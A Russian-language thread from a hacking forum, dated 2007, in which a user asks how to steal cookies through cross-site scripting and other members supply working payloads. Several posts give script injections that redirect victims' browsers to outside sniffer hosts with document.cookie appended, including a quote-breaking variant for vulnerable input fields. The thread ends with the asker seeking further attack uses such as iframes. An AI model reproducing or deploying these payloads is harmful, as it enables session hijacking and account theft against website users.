HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Java-скрипт перенапрваляющий на снифер
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Java-скрипт перенапрваляющий на снифер
  #1  
Старый 09.11.2007, 23:10
RamN999
Новичок
Регистрация: 07.11.2007
Сообщений: 3
С нами: 9741908

Репутация: -5
По умолчанию Java-скрипт перенапрваляющий на снифер
Добрый день!
Подскажите пожалуста содержания скрипта
чтоб он напрвалял куки на снифер.
Например
в xxs уязвимости я писал бы <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

и получал бы куки на снифер..
тоесть надо содержание xss.js

спс
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 09.11.2007, 23:18
__mad
Участник форума
Регистрация: 04.11.2007
Сообщений: 103
С нами: 9745696

Репутация: 104
По умолчанию
<script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>
 
Ответить с цитированием

  #3  
Старый 10.11.2007, 00:06
RamN999
Новичок
Регистрация: 07.11.2007
Сообщений: 3
С нами: 9741908

Репутация: -5
По умолчанию
Я сделал файл xss1.js с такаим содержание :
<script>document.location='http://hackedpro.org/tools/sniff/s.gif' +document.cookie</script>

И залил его сюда: http://xss999.jino-net.ru/xss1.js

теперь я в найденой xss уязвимости пишу : "'><SCRIPT SRC=http://xss999.jino-net.ru/xss1.js></SCRIPT>


но всёравно посемуто не получаю лог на снифер, где я ошибся?
 
Ответить с цитированием

  #4  
Старый 10.11.2007, 00:15
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию
пиши в найденной xss "'><script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>
 
Ответить с цитированием

  #5  
Старый 10.11.2007, 00:20
__mad
Участник форума
Регистрация: 04.11.2007
Сообщений: 103
С нами: 9745696

Репутация: 104
По умолчанию
кароч читай вот это http://bugtraq.ru/library/www/xssanatomy.html
 
Ответить с цитированием

  #6  
Старый 10.11.2007, 19:10
RamN999
Новичок
Регистрация: 07.11.2007
Сообщений: 3
С нами: 9741908

Репутация: -5
По умолчанию
Всё спс разобрался,но теперь ещё вопрос есть..
Что можно сделать(помимо воровства куки) с помощью Xss уязвимости, если ваще нет никакой фильтрацции, тоесть допустимы любые теги?
 
Ответить с цитированием

  #7  
Старый 10.11.2007, 22:31
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами: 10038327

Репутация: 251


По умолчанию
Ифрейм!)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Разные скрипты r@mbler PHP 4 06.03.2007 18:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.